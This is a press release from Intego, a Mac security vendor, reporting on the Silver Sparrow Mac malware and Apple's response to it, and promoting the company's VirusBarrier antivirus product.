Seattle, WA, FEBRUARY, 2021
A new family of Mac malware dubbed Silver Sparrow (detected by Intego and others as OSX/Slisp) has apparently infected at least 40,000 Macs, according to reports. It is also one of the first pieces of Mac malware that runs natively on Apple’s new M1 processors. These facts combined have propelled Silver Sparrow into the mainstream media spotlight.
What potential harm can Silver Sparrow do to Macs?
At this time, the malware installer packages will no longer run. Apple addressed the two known variants of Silver Sparrow by revoking the developer’s code-signing certificates. Because the malware is no longer signed by an authorized Apple Developer ID, the two known variants of the malware won’t be able to run anymore if someone tries to install them today.
However, it’s worth noting that Apple’s mitigation efforts may not necessarily remove all existing malware infections, and may not block potential future Silver Sparrow variants that would presumably be signed with yet another Apple Developer ID.
Before Apple’s revocation of the code-signing certificates, the malware would install a LaunchAgent as a “persistence” method (i.e. a way for the malware to continue running, even after a victim restarts their Mac).
The LaunchAgent would check an Amazon AWS S3 bucket for further instructions and a potential additional malicious payload, but so far researchers have not yet observed the malware downloading any final payloads. It appears that Amazon may have shut down the S3 buckets that were associated with the two known Silver Sparrow variants.
Theoretically, before the revocation of their Apple certificates and cancelation of their S3 buckets, it’s possible that a final payload may have been available for a short period of time, or may have only been made available to certain victims. However, this is only speculation, and this theory, unfortunately, cannot be confirmed based on the currently available evidence.
How can one remove or prevent Silver Sparrow and other threats?
Given that Apple has frequently notarized Mac malware, and Apple’s other threat mitigation features such as Gatekeeper, XProtect, and MRT do not block many types of threats, it is evident that Apple’s own macOS protection methods are insufficient by themselves.
Intego X9 software boxesIntego VirusBarrier X9, included with Intego’s Mac Premium Bundle X9, can protect against, detect, and eliminate this malware. VirusBarrier detects Silver Sparrow as OSX/Slisp.
VirusBarrier is designed by Mac security experts, and it protects against a much wider variety of malware than Apple’s mitigation methods.
Although some reports have suggested that users can “vaccinate” their Macs by creating a blank file at ~/Library/._insu (which could theoretically prevent the malware from installing, or cause the malware to remove itself), and at least one company actually created a script to assist users in doing so, we do not recommend this for several reasons, as follows.
Apple has already effectively disabled the two known variants of this malware, so it should not be possible for it to install anymore. Additionally, any potential future versions of this malware would likely avoid installing itself based on the existence of a file whose path is now widely known to the public. Moreover, installing your own empty file at ~/Library/._insu can lead to false-positive detections from some anti-malware products, which can make it more difficult for those companies to determine the actual reach of the malware.
If you believe your Mac may have been infected, or to prevent future infections, it’s best to use antivirus software from a trusted Mac developer that includes real-time scanning, such as VirusBarrier X9—which also protects Macs from the first known M1-native malware, a variant of OSX/Pirrit. VirusBarrier proactively blocked the new Pirrit variant before it was even discovered.
Intego offers an award-winning line of products providing Mac security and enhancing Mac performance. Intego has been designing software to protect and optimize Apple products for over 17 years. No other company has been focused on Mac security and performance as long as Intego. Intego creates products for a full range of Mac and iOS devices, such as iPhones and iPads. Its depth of experience allows the company to create software that not only works well, but is elegant and intuitive. Much like a Mac.